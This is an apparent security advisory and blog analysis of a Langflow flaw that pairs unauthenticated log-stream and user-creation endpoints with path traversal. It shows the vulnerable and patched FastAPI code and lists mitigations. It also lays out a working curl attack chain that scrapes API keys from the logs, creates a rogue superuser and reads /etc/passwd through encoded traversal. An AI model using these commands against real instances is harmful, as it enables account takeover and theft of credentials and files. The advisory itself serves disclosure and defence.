The Langflow dev team forgot to lock the front door. Critical API endpoints—including log streams and user creation—lacked authentication checks. Combined with a path traversal vulnerability in the profile picture handler, unauthenticated attackers could fully compromise the instance, steal OpenAI/Anthropic keys, and exfiltrate server files.
Langflow, a popular visual framework for building AI agents, shipped with critical endpoints completely exposed to unauthenticated users. This vulnerability allowed attackers to stream live application logs (leaking API keys), create administrative users, and read arbitrary files via directory traversal.
In the gold rush of GenAI, everyone is building a platform. Langflow is one of the shiny ones—a low-code UI to drag-and-drop your way to a sentient AI agent. It handles the messy stuff: chaining prompts, managing LLM API keys, and storing vector database credentials. Ideally, you want this kind of infrastructure to be tighter than a submarine hatch.
But here’s the thing about 'moving fast and breaking things': sometimes what you break is the concept of access control. CVE-2026-21445 isn't some complex heap overflow requiring precise memory grooming. It’s far more embarrassing. It is the architectural equivalent of installing a bank vault door but leaving the frame entirely empty.
We aren't talking about a bypass here. We are talking about missing functionality. The developers simply forgot to ask, "Who are you?" before handing over the keys to the kingdom. If you had a Langflow instance exposed to the internet (and Shodan says many of you did), you weren't running a private AI lab; you were running a public charity for hackers needing free GPT-4 credits.
The root cause here is a classic failure in FastAPI implementation. FastAPI is a fantastic framework, but it is explicitly 'opt-in' for security. If you define a route, it is public by default unless you attach a Dependency to verify the user's session or token.
In Langflow's case, the developers created a log_router and a users router but forgot to apply the authentication middleware to specific endpoints. The most egregious offender was /api/v1/logs-stream. This endpoint opens a WebSocket or streaming response that pipes real-time execution logs directly to the client. These logs are verbose. They contain input prompts, output tokens, and—crucially—debugging information that often leaks environment variables or connection strings.
Simultaneously, they introduced a Path Traversal vulnerability (CWE-22) in the profile picture handler. The application accepted folder_name and file_name directly from the URL and concatenated them into a file path without sufficient sanitization. They assumed users would play nice. Narrator voice: Users did not play nice.
[!NOTE] This represents a failure of Secure by Default design. The router itself should have enforced a blanket policy, requiring explicit exemptions for public routes, rather than requiring explicit locks for private ones.
Let's look at the code that made this possible. This is the definition for the log streaming endpoint prior to the patch. Notice the complete lack of Depends(get_current_user).
# VULNERABLE CODE
@log_router.get("/logs-stream")
async def stream_logs(request: Request):
# No auth check. Just pure, unadulterated data leakage.
return EventSourceResponse(log_stream_generator())Any request to this URL, from anyone, starts the stream. Now, let's look at the file handling for profile pictures. It constructs a path using user-supplied strings:
# VULNERABLE CODE
file_path = config_path / "profile_pictures" / folder_name / file_name
if not file_path.exists():
raise HTTPException(status_code=404, detail="File not found")
return FileResponse(file_path)If I send folder_name=".." and file_name="etc/passwd", Python's pathlib might resolve that depending on how the config_path is set up, or standard string manipulation allows escaping the jail.
The Fix:
The patch (Commit 3fed9fe) introduces the missing dependencies and sanitizes the path input.
# PATCHED CODE
@log_router.get("/logs-stream", dependencies=[Depends(get_current_active_user)])
async def stream_logs(request: Request):
# Now we know who you are.
...
# PATCHED FILE HANDLING
base_path = (config_path / "profile_pictures").resolve()
file_path = (base_path / folder_name / file_name).resolve()
# The Jail Check
if not str(file_path).startswith(str(base_path)):
raise HTTPException(status_code=400, detail="Invalid file path")By resolving the path first and then checking if it still starts with the trusted base directory, they eliminate the traversal capability.
Here is how a sophisticated attacker (or a script kiddie with curl) would chain these vulnerabilities for a full system compromise.
Step 1: The Eavesdrop First, we connect to the log stream. We don't need credentials. We just listen.
curl -N http://target-langflow.com/api/v1/logs-streamAs the legitimate admin uses the tool, we see their interactions. "Connecting to OpenAI with key sk-...". Bingo. We scrape that key. Now we have free LLM usage. But we want the server.
Step 2: The Takeover
We noticed the /users/ endpoint is also unprotected. We don't want to just steal keys; we want to be the admin.
curl -X POST http://target-langflow.com/api/v1/users/ \
-H "Content-Type: application/json" \
-d '{"username": "ShadowCorp", "password": "pwned123", "is_superuser": true}'Due to the missing auth check on user creation, we have now registered a valid superuser account.
Step 3: The Looting (Path Traversal)
Just for fun, let's see what's on the filesystem. Maybe there are .env files with database credentials that aren't in the logs.
curl "http://target-langflow.com/api/v1/files/profile_pictures/..%2f/..%2f/etc/passwd"If the application is running as root (please don't run web apps as root, but we know you do), we might grab /etc/shadow. If it's in a container, we grab the environment variables. Game over.
This isn't just about reading logs. Langflow is an orchestration layer. It has access to your Vector DB (Pinecone, Chroma), your LLM providers (OpenAI, Anthropic), and potentially your internal APIs if you've built custom tools.
1. Financial Impact: An attacker steals your OpenAI key. They resell it or use it to generate spam/malware campaigns. You wake up to a $10,000 bill.
2. Data Exfiltration: If you are using Langflow to process proprietary company data (RAG pipelines), an attacker can use the Admin access to query your own knowledge base. They can ask your AI, "What are the Q3 financial projections?" and the AI will happily answer.
3. Denial of Service: The cancel endpoints were also exposed. An attacker could write a script to continuously monitor for new jobs and kill them immediately, rendering the platform useless.
If you are running Langflow < 1.7.0.dev45, you are vulnerable. Stop reading and update.
pip install langflow --upgradeIf you cannot upgrade immediately (why?), you must isolate this service. Langflow should never be exposed to the naked internet without a reverse proxy (Nginx, Traefik) handling authentication before the request reaches the Python application.
Lessons Learned:
/..%2f patterns or enforced basic auth headers.CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:P| Product | Affected Versions | Fixed Version |
|---|---|---|
Langflow langflow-ai | < 1.7.0.dev45 | 1.7.0.dev45 |
| Attribute | Detail |
|---|---|
| CWE ID | CWE-306 (Missing Authentication) |
| Secondary CWE | CWE-22 (Path Traversal) |
| CVSS v4.0 | 8.8 (High) |
| Attack Vector | Network |
| Privileges Required | None |
| Impact | Critical (Data Leakage, RCE potential) |
The software does not prove that a claim of identity is correct when that claim is used to execute a critical function.
Get the latest CVE analysis reports delivered to your inbox.